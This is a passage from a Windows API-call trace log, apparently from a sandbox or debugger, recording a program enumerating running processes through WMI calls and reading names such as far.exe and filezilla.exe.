pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.969] IUnknown:Release (This=0x5ebb204) returned 0x3 [0224.969] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.970] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.970] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.970] IUnknown:Release (This=0x5ebb200) returned 0x2 [0224.970] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.970] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.970] IUnknown:QueryInterface (in: This=0x5ebb200, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebb200) returned 0x0 [0224.970] IUnknown:AddRef (This=0x5ebb200) returned 0x4 [0224.970] IUnknown:Release (This=0x5ebb200) returned 0x3 [0224.970] IUnknown:Release (This=0x5ebb200) returned 0x2 [0224.970] CoTaskMemFree (pv=0x5e8d168) [0224.970] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.970] IUnknown:AddRef (This=0x5ebb200) returned 0x3 [0224.970] IWbemClassObject:Get (in: This=0x5ebb200, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.971] IWbemClassObject:Get (in: This=0x5ebb200, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.971] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x66 [0224.971] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x66 [0224.971] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.971] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.971] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.971] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.972] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8d168) returned 0x0 [0224.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8d168, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.973] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8d168, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8658) returned 0x0 [0224.973] WbemDefPath:IUnknown:Release (This=0x5e8d168) returned 0x0 [0224.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8658) returned 0x0 [0224.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.973] WbemDefPath:IUnknown:AddRef (This=0x5eb8658) returned 0x3 [0224.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebae00) returned 0x0 [0224.973] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebae00, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.973] WbemDefPath:IUnknown:Release (This=0x5ebae00) returned 0x3 [0224.974] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.974] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.974] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.974] WbemDefPath:IUnknown:Release (This=0x5eb8658) returned 0x2 [0224.974] WbemDefPath:IUnknown:Release (This=0x5eb8658) returned 0x1 [0224.974] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.974] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.974] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8658, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8658) returned 0x0 [0224.974] WbemDefPath:IUnknown:AddRef (This=0x5eb8658) returned 0x3 [0224.974] WbemDefPath:IUnknown:Release (This=0x5eb8658) returned 0x2 [0224.974] WbemDefPath:IWbemPath:SetText (This=0x5eb8658, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x0 [0224.974] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.974] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.974] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.974] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.974] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.974] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.974] IWbemClassObject:Get (in: This=0x5ebb200, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26eedd0*=0, plFlavor=0x26eedd4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x26eedd0*=8, plFlavor=0x26eedd4*=0) returned 0x0 [0224.975] SysStringByteLen (bstr="far.exe") returned 0xe [0224.975] SysStringByteLen (bstr="far.exe") returned 0xe [0224.975] IWbemClassObject:Get (in: This=0x5ebb200, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26eedd0*=8, plFlavor=0x26eedd4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x26eedd0*=8, plFlavor=0x26eedd4*=0) returned 0x0 [0224.975] SysStringByteLen (bstr="far.exe") returned 0xe [0224.975] SysStringByteLen (bstr="far.exe") returned 0xe [0224.975] CoTaskMemAlloc (cb=0x4) returned 0x5ebae30 [0224.975] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebae30, puReturned=0x26dde18 | out: apObjects=0x5ebae30*=0x5ebb398, puReturned=0x26dde18*=0x1) returned 0x0 [0224.976] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebb398) returned 0x0 [0224.976] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.976] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.976] IUnknown:AddRef (This=0x5ebb398) returned 0x3 [0224.976] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.976] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.976] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebb39c) returned 0x0 [0224.976] IMarshal:GetUnmarshalClass (in: This=0x5ebb39c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.977] IUnknown:Release (This=0x5ebb39c) returned 0x3 [0224.977] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.977] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.977] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.977] IUnknown:Release (This=0x5ebb398) returned 0x2 [0224.977] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.977] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.977] IUnknown:QueryInterface (in: This=0x5ebb398, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebb398) returned 0x0 [0224.977] IUnknown:AddRef (This=0x5ebb398) returned 0x4 [0224.977] IUnknown:Release (This=0x5ebb398) returned 0x3 [0224.977] IUnknown:Release (This=0x5ebb398) returned 0x2 [0224.977] CoTaskMemFree (pv=0x5ebae30) [0224.977] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.977] IUnknown:AddRef (This=0x5ebb398) returned 0x3 [0224.977] IWbemClassObject:Get (in: This=0x5ebb398, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.978] IWbemClassObject:Get (in: This=0x5ebb398, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.978] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x66 [0224.978] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x66 [0224.978] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.978] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.978] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.978] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.979] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebae30) returned 0x0 [0224.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebae30, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.979] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebae30, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8738) returned 0x0 [0224.979] WbemDefPath:IUnknown:Release (This=0x5ebae30) returned 0x0 [0224.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8738) returned 0x0 [0224.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.980] WbemDefPath:IUnknown:AddRef (This=0x5eb8738) returned 0x3 [0224.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebae40) returned 0x0 [0224.980] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebae40, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.980] WbemDefPath:IUnknown:Release (This=0x5ebae40) returned 0x3 [0224.980] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.980] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.981] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.981] WbemDefPath:IUnknown:Release (This=0x5eb8738) returned 0x2 [0224.981] WbemDefPath:IUnknown:Release (This=0x5eb8738) returned 0x1 [0224.981] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.981] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.981] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8738, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8738) returned 0x0 [0224.981] WbemDefPath:IUnknown:AddRef (This=0x5eb8738) returned 0x3 [0224.981] WbemDefPath:IUnknown:Release (This=0x5eb8738) returned 0x2 [0224.981] WbemDefPath:IWbemPath:SetText (This=0x5eb8738, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x0 [0224.981] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.981] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.981] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.981] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.981] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.981] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.981] IWbemClassObject:Get (in: This=0x5ebb398, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ef62c*=0, plFlavor=0x26ef630*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x26ef62c*=8, plFlavor=0x26ef630*=0) returned 0x0 [0224.981] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0224.981] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0224.981] IWbemClassObject:Get (in: This=0x5ebb398, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ef62c*=8, plFlavor=0x26ef630*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="filezilla.exe", varVal2=0x0), pType=0x26ef62c*=8, plFlavor=0x26ef630*=0) returned 0x0 [0224.982] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0224.982] SysStringByteLen (bstr="filezilla.exe") returned 0x1a [0224.982] CoTaskMemAlloc (cb=0x4) returned 0x5ebae70 [0224.982] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebae70, puReturned=0x26dde18 | out: apObjects=0x5ebae70*=0x5ebb530, puReturned=0x26dde18*=0x1) returned 0x0 [0225.068] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebb530) returned 0x0 [0225.069] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.069] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.069] IUnknown:AddRef (This=0x5ebb530) returned 0x3 [0225.069] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71e4182c*(Data1=0xecc8691b, 